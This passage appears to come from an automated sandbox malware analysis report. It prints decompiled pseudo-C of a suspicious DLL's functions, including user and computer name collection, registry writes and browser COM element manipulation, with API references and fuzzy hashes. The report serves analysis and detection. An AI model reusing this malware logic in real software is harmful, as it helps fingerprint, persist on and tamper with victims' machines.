                                                  • Instruction Fuzzy Hash: 1E213071A00218ABDB11AF65DD42FEEBBF8AF09340F04402AFD14F6251D736DA02CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00EC7649() {
                                                  				long _v8;
                                                  				long _v12;
                                                  				int _v16;
                                                  				long _t39;
                                                  				long _t43;
                                                  				signed int _t47;
                                                  				signed int _t52;
                                                  				int _t56;
                                                  				int _t57;
                                                  				char* _t63;
                                                  				short* _t66;
                                                  
                                                  				_v16 = 0;
                                                  				_v8 = 0;
                                                  				GetUserNameW(0,  &_v8);
                                                  				_t39 = _v8;
                                                  				if(_t39 != 0) {
                                                  					_v12 = _t39;
                                                  					_v8 = 0;
                                                  					GetComputerNameW(0,  &_v8);
                                                  					_t43 = _v8;
                                                  					if(_t43 != 0) {
                                                  						_v12 = _v12 + _t43 + 2;
                                                  						_t63 = E00EC2049(_v12 + _t43 + 2 << 2);
                                                  						if(_t63 != 0) {
                                                  							_t47 = _v12;
                                                  							_t66 = _t63 + _t47 * 2;
                                                  							_v8 = _t47;
                                                  							if(GetUserNameW(_t66,  &_v8) == 0) {
                                                  								L7:
                                                  								E00EC9039(_t63);
                                                  							} else {
                                                  								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
                                                  								_t52 = _v8;
                                                  								_v12 = _v12 - _t52;
                                                  								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
                                                  									goto L7;
                                                  								} else {
                                                  									_t56 = _v12 + _v8;
                                                  									_t31 = _t56 + 2; // 0xeca33a
                                                  									_v12 = _t56;
                                                  									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
                                                  									_v8 = _t57;
                                                  									if(_t57 == 0) {
                                                  										goto L7;
                                                  									} else {
                                                  										_t63[_t57] = 0;
                                                  										_v16 = _t63;
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _v16;
                                                  			}

                                                  Instruction addresses: 0x00ec7657 0x00ec765a 0x00ec765d 0x00ec7663 0x00ec7668 0x00ec766e 0x00ec7676 0x00ec7679 0x00ec767f 0x00ec7684 0x00ec7691 0x00ec769e 0x00ec76a2 0x00ec76a4 0x00ec76a8 0x00ec76ab 0x00ec76bb 0x00ec770d 0x00ec770e 0x00ec76bd 0x00ec76c0 0x00ec76c7 0x00ec76ca 0x00ec76dd 0x00000000 0x00ec76df 0x00ec76e2 0x00ec76e7 0x00ec76f5 0x00ec76f8 0x00ec7700 0x00ec7703 0x00000000 0x00ec7705 0x00ec7705 0x00ec7708 0x00ec7708 0x00ec7703 0x00ec76dd 0x00ec7713 0x00ec7714 0x00ec7684 0x00ec771a

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,00ECA338), ref: 00EC765D
                                                  • GetComputerNameW.KERNEL32(00000000,00ECA338), ref: 00EC7679
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • GetUserNameW.ADVAPI32(00000000,00ECA338), ref: 00EC76B3
                                                  • GetComputerNameW.KERNEL32(00ECA338,?), ref: 00EC76D5
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00ECA338,00000000,00ECA33A,00000000,00000000,?,?,00ECA338), ref: 00EC76F8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                  • String ID:
                                                  • API String ID: 3850880919-0
                                                  • Opcode ID: 23dd9b29b5ace8d0caade126c445a557c64a7be3196f04a4a652fbd9c11c9e4f
                                                  • Instruction ID: db62c8cb4c8d77ed92c8819a25971122713f0ae3d97e4658e297e36ff885c44e
                                                  • Opcode Fuzzy Hash: 23dd9b29b5ace8d0caade126c445a557c64a7be3196f04a4a652fbd9c11c9e4f
                                                  • Instruction Fuzzy Hash: 7C21D776900208FFCB11DFA9DA85DEEBBB8EF44304B6054AAE505E7201D7319F46DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E00EC1585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                  				void* __esi;
                                                  				long _t10;
                                                  				void* _t18;
                                                  				void* _t22;
                                                  
                                                  				_t9 = __eax;
                                                  				_t22 = __eax;
                                                  				if(_a4 != 0 && E00EC7F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                  					L9:
                                                  					return GetLastError();
                                                  				}
                                                  				_t10 = E00ECA9AB(_t9, _t18, _t22, _a8);
                                                  				if(_t10 == 0) {
                                                  					ResetEvent( *(_t22 + 0x1c));
                                                  					ResetEvent( *(_t22 + 0x20));
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0xffffffff);
                                                  					_push(0);
                                                  					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                  					if( *0xecd130() != 0) {
                                                  						SetEvent( *(_t22 + 0x1c));
                                                  						goto L7;
                                                  					} else {
                                                  						_t10 = GetLastError();
                                                  						if(_t10 == 0x3e5) {
                                                  							L7:
                                                  							_t10 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				if(_t10 == 0xffffffff) {
                                                  					goto L9;
                                                  				}
                                                  				return _t10;
                                                  			}

                                                  Instruction addresses: 0x00ec1585 0x00ec1592 0x00ec1594 0x00ec15f7 0x00000000 0x00ec15f7 0x00ec15ac 0x00ec15b3 0x00ec15bf 0x00ec15c4 0x00ec15c6 0x00ec15c8 0x00ec15ca 0x00ec15cc 0x00ec15ce 0x00ec15da 0x00ec15ea 0x00000000 0x00ec15dc 0x00ec15dc 0x00ec15e3 0x00ec15f0 0x00ec15f0 0x00ec15f0 0x00ec15e3 0x00ec15da 0x00ec15f5 0x00000000 0x00000000 0x00ec15fb

                                                  APIs
                                                  • ResetEvent.KERNEL32(?,00000008,?,?,00000102,00EC11DA,?,?,00000000,00000000), ref: 00EC15BF
                                                  • ResetEvent.KERNEL32(?), ref: 00EC15C4
                                                  • GetLastError.KERNEL32 ref: 00EC15DC
                                                  • GetLastError.KERNEL32(?,?,00000102,00EC11DA,?,?,00000000,00000000), ref: 00EC15F7
                                                    • Part of subcall function 00EC7F27: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,00EC15A4,?,?,?,?,00000102,00EC11DA,?,?,00000000), ref: 00EC7F33
                                                    • Part of subcall function 00EC7F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00EC15A4,?,?,?,?,00000102,00EC11DA,?), ref: 00EC7F91
                                                    • Part of subcall function 00EC7F27: lstrcpy.KERNEL32(00000000,00000000), ref: 00EC7FA1
                                                  • SetEvent.KERNEL32(?), ref: 00EC15EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1449191863-0
                                                  • Opcode ID: 1c6382f19703d74c926d75f0b8c5092d7ac28e130517e3028ee8eb2a1f33a5be
                                                  • Instruction ID: 6a1f764d69ac12538da74328dec802dd868c211efb80d7105b686afbbbad9a65
                                                  • Opcode Fuzzy Hash: 1c6382f19703d74c926d75f0b8c5092d7ac28e130517e3028ee8eb2a1f33a5be
                                                  • Instruction Fuzzy Hash: 3A01AD31104641AFD6306B32DE45F1BB6A8FF86368F205A3DF056B10F1DA22EC1B9A21
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00EC7CB8(void* __ecx, WCHAR* _a4, void* _a8) {
                                                  				void* _v8;
                                                  				int _t14;
                                                  				void* _t18;
                                                  				int _t25;
                                                  				int _t29;
                                                  				int _t34;
                                                  
                                                  				_t14 = lstrlenW(_a4);
                                                  				_t2 =  &_a8; // 0xec747c
                                                  				_t29 = _t14;
                                                  				_t25 = lstrlenW( *_t2);
                                                  				_t18 = E00EC2049(_t25 + _t29 + _t25 + _t29 + 2);
                                                  				_v8 = _t18;
                                                  				if(_t18 != 0) {
                                                  					_t34 = _t29 + _t29;
                                                  					memcpy(_t18, _a4, _t34);
                                                  					_t10 = _t25 + 2; // 0x2
                                                  					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                  				}
                                                  				return _v8;
                                                  			}

                                                  Instruction addresses: 0x00ec7cc8 0x00ec7cca 0x00ec7ccd 0x00ec7cd1 0x00ec7cdb 0x00ec7ce2 0x00ec7ce5 0x00ec7ce7 0x00ec7cef 0x00ec7cf4 0x00ec7d02 0x00ec7d07 0x00ec7d11

                                                  APIs
                                                  • lstrlenW.KERNEL32(004F0053,75145520,?,00000008,0300937C,?,00EC747C,004F0053,0300937C,?,?,?,?,?,?,00EC6814), ref: 00EC7CC8
                                                  • lstrlenW.KERNEL32(|t,?,00EC747C,004F0053,0300937C,?,?,?,?,?,?,00EC6814), ref: 00EC7CCF
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • memcpy.NTDLL(00000000,?,751469A0,?,?,00EC747C,004F0053,0300937C,?,?,?,?,?,?,00EC6814), ref: 00EC7CEF
                                                  • memcpy.NTDLL(751469A0,?,00000002,00000000,?,751469A0,?,?,00EC747C,004F0053,0300937C), ref: 00EC7D02
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                  • String ID: |t
                                                  • API String ID: 2411391700-1785604035
                                                  • Opcode ID: 5cc02497d873d99cbda21a9088b887f4e38b35211e26b9997d20b3954d738c8d
                                                  • Instruction ID: 6ac23061dcb9ed8c000cddc1af8ff016ea9887680b9abca6dea8d00e85e932c8
                                                  • Opcode Fuzzy Hash: 5cc02497d873d99cbda21a9088b887f4e38b35211e26b9997d20b3954d738c8d
                                                  • Instruction Fuzzy Hash: 6CF03C72900118BBCB11DFA9CD45DDE7BACEF093547114066FD08E7111E732EA159BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00EC8F10(intOrPtr _a4) {
                                                  				void* _t2;
                                                  				long _t4;
                                                  				void* _t5;
                                                  				long _t6;
                                                  				void* _t7;
                                                  				void* _t13;
                                                  
                                                  				_t2 = CreateEventA(0, 1, 0, 0);
                                                  				 *0xecd26c = _t2;
                                                  				if(_t2 == 0) {
                                                  					return GetLastError();
                                                  				}
                                                  				_t4 = GetVersion();
                                                  				if(_t4 != 5) {
                                                  					L4:
                                                  					if(_t13 <= 0) {
                                                  						_t5 = 0x32;
                                                  						return _t5;
                                                  					}
                                                  					L5:
                                                  					 *0xecd25c = _t4;
                                                  					_t6 = GetCurrentProcessId();
                                                  					 *0xecd258 = _t6;
                                                  					 *0xecd264 = _a4;
                                                  					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                  					 *0xecd254 = _t7;
                                                  					if(_t7 == 0) {
                                                  						 *0xecd254 =  *0xecd254 | 0xffffffff;
                                                  					}
                                                  					return 0;
                                                  				}
                                                  				if(_t4 > 0) {
                                                  					goto L5;
                                                  				}
                                                  				_t13 = _t4 - _t4;
                                                  				goto L4;
			}

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00EC6A90,?,?,00000001,?,?,?,00EC807D,?), ref: 00EC8F18
                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,00EC807D,?), ref: 00EC8F27
                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00EC807D,?), ref: 00EC8F3E
                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00EC807D,?), ref: 00EC8F5B
                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,00EC807D,?), ref: 00EC8F7A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                  • String ID:
                                                  • API String ID: 2270775618-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E00EC17D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                  				signed int _v8;
                                                  				char _v12;
                                                  				signed int* _v16;
                                                  				char _v284;
                                                  				void* __esi;
                                                  				char* _t60;
                                                  				intOrPtr* _t61;
                                                  				intOrPtr _t65;
                                                  				char _t68;
                                                  				intOrPtr _t72;
                                                  				intOrPtr _t73;
                                                  				intOrPtr _t75;
                                                  				void* _t78;
                                                  				void* _t88;
                                                  				void* _t97;
                                                  				void* _t98;
                                                  				char _t104;
                                                  				signed int* _t106;
                                                  				intOrPtr* _t107;
                                                  				void* _t108;
                                                  
                                                  				_t98 = __ecx;
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_t104 = _a16;
                                                  				if(_t104 == 0) {
                                                  					__imp__( &_v284,  *0xecd33c);
                                                  					_t97 = 0x80000002;
                                                  					L6:
                                                  					_t60 = E00EC809F(0,  &_v284);
                                                  					_a8 = _t60;
                                                  					if(_t60 == 0) {
                                                  						_v8 = 8;
                                                  						L29:
                                                  						_t61 = _a20;
                                                  						if(_t61 != 0) {
                                                  							 *_t61 =  *_t61 + 1;
                                                  						}
                                                  						return _v8;
                                                  					}
                                                  					_t107 = _a24;
                                                  					if(E00EC88B7(_t98, _t103, _t107, _t97, _t60) != 0) {
                                                  						L27:
                                                  						E00EC9039(_a8);
                                                  						goto L29;
                                                  					}
                                                  					_t65 =  *0xecd27c; // 0x213a5a8
                                                  					_t16 = _t65 + 0xece8fe; // 0x65696c43
                                                  					_t68 = E00EC809F(0, _t16);
                                                  					_a24 = _t68;
                                                  					if(_t68 == 0) {
                                                  						L14:
                                                  						_t29 = _t107 + 0x14; // 0x102
                                                  						_t33 = _t107 + 0x10; // 0x3d00ecc0
                                                  						if(E00ECA635(_t103,  *_t33, _t97, _a8,  *0xecd334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                                  							_t72 =  *0xecd27c; // 0x213a5a8
                                                  							if(_t104 == 0) {
                                                  								_t35 = _t72 + 0xecea5f; // 0x4d4c4b48
                                                  								_t73 = _t35;
                                                  							} else {
                                                  								_t34 = _t72 + 0xece89f; // 0x55434b48
                                                  								_t73 = _t34;
                                                  							}
                                                  							if(E00EC816C(_t73,  *0xecd334,  *0xecd338,  &_a24,  &_a16) == 0) {
                                                  								if(_t104 == 0) {
                                                  									_t75 =  *0xecd27c; // 0x213a5a8
                                                  									_t44 = _t75 + 0xece871; // 0x74666f53
                                                  									_t78 = E00EC809F(0, _t44);
                                                  									_t105 = _t78;
                                                  									if(_t78 == 0) {
                                                  										_v8 = 8;
                                                  									} else {
                                                  										_t47 = _t107 + 0x10; // 0x3d00ecc0
                                                  										E00EC2659( *_t47, _t97, _a8,  *0xecd338, _a24);
                                                  										_t49 = _t107 + 0x10; // 0x3d00ecc0
                                                  										E00EC2659( *_t49, _t97, _t105,  *0xecd330, _a16);
                                                  										E00EC9039(_t105);
                                                  									}
                                                  								} else {
                                                  									_t40 = _t107 + 0x10; // 0x3d00ecc0
                                                  									E00EC2659( *_t40, _t97, _a8,  *0xecd338, _a24);
                                                  									_t43 = _t107 + 0x10; // 0x3d00ecc0
                                                  									E00EC2659( *_t43, _t97, _a8,  *0xecd330, _a16);
                                                  								}
                                                  								if( *_t107 != 0) {
                                                  									E00EC9039(_a24);
                                                  								} else {
                                                  									 *_t107 = _a16;
                                                  								}
                                                  							}
                                                  						}
                                                  						goto L27;
                                                  					}
                                                  					_t21 = _t107 + 0x10; // 0x3d00ecc0
                                                  					if(E00EC6BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
                                                  						_t106 = _v16;
                                                  						_t88 = 0x28;
                                                  						if(_v12 == _t88) {
                                                  							 *_t106 =  *_t106 & 0x00000000;
                                                  							_t26 = _t107 + 0x10; // 0x3d00ecc0
                                                  							E00ECA635(_t103,  *_t26, _t97, _a8, _a24, _t106);
                                                  						}
                                                  						E00EC9039(_t106);
                                                  						_t104 = _a16;
                                                  					}
                                                  					E00EC9039(_a24);
                                                  					goto L14;
                                                  				}
                                                  				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                  					goto L29;
                                                  				} else {
                                                  					_t103 = _a8;
                                                  					E00ECA8D8(_t104, _a8,  &_v284);
                                                  					__imp__(_t108 + _t104 - 0x117,  *0xecd33c);
                                                  					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
                                                  					_t97 = 0x80000003;
                                                  					goto L6;
                                                  				}
			}

                                                  APIs
                                                  • StrChrA.SHLWAPI(00EC3C81,0000005F,00000000,00000000,00000104), ref: 00EC1808
                                                  • lstrcpy.KERNEL32(?,?), ref: 00EC1835
                                                    • Part of subcall function 00EC809F: lstrlen.KERNEL32(?,00000000,00ECD330,00000001,00EC2200,00ECD00C,00ECD00C,00000000,00000005,00000000,00000000,?,?,?,00EC96C1,#), ref: 00EC80A8
                                                    • Part of subcall function 00EC809F: mbstowcs.NTDLL ref: 00EC80CF
                                                    • Part of subcall function 00EC809F: memset.NTDLL ref: 00EC80E1
                                                    • Part of subcall function 00EC2659: lstrlenW.KERNEL32(00EC3C81,?,?,00EC19A9,3D00ECC0,80000002,00EC3C81,00EC8B1E,74666F53,4D4C4B48,00EC8B1E,?,3D00ECC0,80000002,00EC3C81,?), ref: 00EC2679
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00EC1857
                                                  Strings
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                  • String ID: \
                                                  • API String ID: 3924217599-2967466578
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 16%
                                                  			E00EC396D(char* __esi) {
                                                  				char _v0;
                                                  				intOrPtr _t4;
                                                  				intOrPtr _t6;
                                                  				intOrPtr _t9;
                                                  				char _t14;
                                                  				char* _t16;
                                                  
                                                  				_t16 = __esi;
                                                  				_t4 =  *0xecd32c; // 0x30095b0
                                                  				__imp__(_t4 + 0x40);
                                                  				while(1) {
                                                  					_t6 =  *0xecd32c; // 0x30095b0
                                                  					_t1 = _t6 + 0x58; // 0x0
                                                  					if( *_t1 == 0) {
                                                  						break;
                                                  					}
                                                  					Sleep(0xa);
                                                  				}
                                                  				_t14 =  *_t16;
                                                  				if(_t14 ==  *_t16) {
                                                  					_t2 =  &_v0; // 0xec685f
                                                  					_t14 = _t14 + 1;
                                                  					if(_t14 >=  *((intOrPtr*)( *_t2 + 4))) {
                                                  						_t14 = 0;
                                                  					}
                                                  					 *_t16 = _t14;
                                                  				}
                                                  				_t9 =  *0xecd32c; // 0x30095b0
                                                  				__imp__(_t9 + 0x40);
                                                  				return _t14;
			}

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(03009570), ref: 00EC3976
                                                  • Sleep.KERNEL32(0000000A,?,00EC685F,00000002,?,?,00EC2417,?), ref: 00EC3980
                                                  • RtlLeaveCriticalSection.NTDLL(03009570), ref: 00EC39B3
                                                  Strings
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeaveSleep
                                                  • String ID: _h
                                                  • API String ID: 1566154052-4139817520
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 46%
                                                  			E00EC52F9(intOrPtr* __eax) {
                                                  				void* _v8;
                                                  				WCHAR* _v12;
                                                  				void* _v16;
                                                  				char _v20;
                                                  				void* _v24;
                                                  				intOrPtr _v28;
                                                  				void* _v32;
                                                  				intOrPtr _v40;
                                                  				short _v48;
                                                  				intOrPtr _v56;
                                                  				short _v64;
                                                  				intOrPtr* _t54;
                                                  				intOrPtr* _t56;
                                                  				intOrPtr _t57;
                                                  				intOrPtr* _t58;
                                                  				intOrPtr* _t60;
                                                  				void* _t61;
                                                  				intOrPtr* _t63;
                                                  				intOrPtr* _t65;
                                                  				intOrPtr* _t67;
                                                  				intOrPtr* _t69;
                                                  				intOrPtr* _t71;
                                                  				intOrPtr* _t74;
                                                  				intOrPtr* _t76;
                                                  				intOrPtr _t78;
                                                  				intOrPtr* _t82;
                                                  				intOrPtr* _t86;
                                                  				intOrPtr _t102;
                                                  				intOrPtr _t108;
                                                  				void* _t117;
                                                  				void* _t121;
                                                  				void* _t122;
                                                  				intOrPtr _t129;
                                                  
                                                  				_t122 = _t121 - 0x3c;
                                                  				_push( &_v8);
                                                  				_push(__eax);
                                                  				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                                  				if(_t117 >= 0) {
                                                  					_t54 = _v8;
                                                  					_t102 =  *0xecd27c; // 0x213a5a8
                                                  					_t5 = _t102 + 0xece038; // 0x3050f485
                                                  					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                  					_t56 = _v8;
                                                  					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                  					if(_t117 >= 0) {
                                                  						__imp__#2(0xecc2b0);
                                                  						_v28 = _t57;
                                                  						if(_t57 == 0) {
                                                  							_t117 = 0x8007000e;
                                                  						} else {
                                                  							_t60 = _v32;
                                                  							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                  							_t86 = __imp__#6;
                                                  							_t117 = _t61;
                                                  							if(_t117 >= 0) {
                                                  								_t63 = _v24;
                                                  								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                  								if(_t117 >= 0) {
                                                  									_t129 = _v20;
                                                  									if(_t129 != 0) {
                                                  										_v64 = 3;
                                                  										_v48 = 3;
                                                  										_v56 = 0;
                                                  										_v40 = 0;
                                                  										if(_t129 > 0) {
                                                  											while(1) {
                                                  												_t67 = _v24;
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												_t122 = _t122;
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                                  												if(_t117 < 0) {
                                                  													goto L16;
                                                  												}
                                                  												_t69 = _v8;
                                                  												_t108 =  *0xecd27c; // 0x213a5a8
                                                  												_t28 = _t108 + 0xece0bc; // 0x3050f1ff
                                                  												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                                  												if(_t117 >= 0) {
                                                  													_t74 = _v16;
                                                  													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                                  													if(_t117 >= 0 && _v12 != 0) {
                                                  														_t78 =  *0xecd27c; // 0x213a5a8
                                                  														_t33 = _t78 + 0xece078; // 0x76006f
                                                  														if(lstrcmpW(_v12, _t33) == 0) {
                                                  															_t82 = _v16;
                                                  															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                                  														}
                                                  														 *_t86(_v12);
                                                  													}
                                                  													_t76 = _v16;
                                                  													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                                  												}
                                                  												_t71 = _v8;
                                                  												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                  												_v40 = _v40 + 1;
                                                  												if(_v40 < _v20) {
                                                  													continue;
                                                  												}
                                                  												goto L16;
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  								L16:
                                                  								_t65 = _v24;
                                                  								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                  							}
                                                  							 *_t86(_v28);
                                                  						}
                                                  						_t58 = _v32;
                                                  						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                  					}
                                                  				}
                                                  				return _t117;
                                                  			}
                                                  Instruction address gutter for the function above (one address per decompiled statement, spilled out of the two-column layout): 0x00ec52fe to 0x00ec548b

                                                  APIs
                                                  • SysAllocString.OLEAUT32(00ECC2B0), ref: 00EC5349
                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00EC542B
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00EC5444
                                                  • SysFreeString.OLEAUT32(?), ref: 00EC5473
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloclstrcmp
                                                  • String ID:
                                                  • API String ID: 1885612795-0
                                                  • Opcode ID: 66118f15928df1143524c1f69bf6a54999dc7c6189378f16f245fc252d69b6bb
                                                  • Instruction ID: 8939efe57b28daa473ef168fa269c9d65ae0760e307d20cc4c768472873ee512
                                                  • Opcode Fuzzy Hash: 66118f15928df1143524c1f69bf6a54999dc7c6189378f16f245fc252d69b6bb
                                                  • Instruction Fuzzy Hash: 2D515F72D00509DFCB04DFA8C988DAEB7B9FF88705B144598E915FB210D732AD82CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E00EC1017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				signed int _v16;
                                                  				void _v92;
                                                  				void _v236;
                                                  				void* _t55;
                                                  				unsigned int _t56;
                                                  				signed int _t66;
                                                  				signed int _t74;
                                                  				void* _t76;
                                                  				signed int _t79;
                                                  				void* _t81;
                                                  				void* _t92;
                                                  				void* _t96;
                                                  				signed int* _t99;
                                                  				signed int _t101;
                                                  				signed int _t103;
                                                  				void* _t107;
                                                  
                                                  				_t92 = _a12;
                                                  				_t101 = __eax;
                                                  				_t55 = E00ECA7AA(_a16, _t92);
                                                  				_t79 = _t55;
                                                  				if(_t79 == 0) {
                                                  					L18:
                                                  					return _t55;
                                                  				}
                                                  				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                  				_t81 = 0;
                                                  				_t96 = 0x20;
                                                  				if(_t56 == 0) {
                                                  					L4:
                                                  					_t97 = _t96 - _t81;
                                                  					_v12 = _t96 - _t81;
                                                  					E00EC968F(_t79,  &_v236);
                                                  					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00EC8967(_t101,  &_v236, _a8, _t96 - _t81);
                                                  					E00EC8967(_t79,  &_v92, _a12, _t97);
                                                  					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                  					_t66 = E00EC968F(_t101, 0xecd1b0);
                                                  					_t103 = _t101 - _t79;
                                                  					_a8 = _t103;
                                                  					if(_t103 < 0) {
                                                  						L17:
                                                  						E00EC968F(_a16, _a4);
                                                  						E00EC1D6C(_t79,  &_v236, _a4, _t97);
                                                  						memset( &_v236, 0, 0x8c);
                                                  						_t55 = memset( &_v92, 0, 0x44);
                                                  						goto L18;
                                                  					}
                                                  					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                  					do {
                                                  						if(_v8 != 0xffffffff) {
                                                  							_push(1);
                                                  							_push(0);
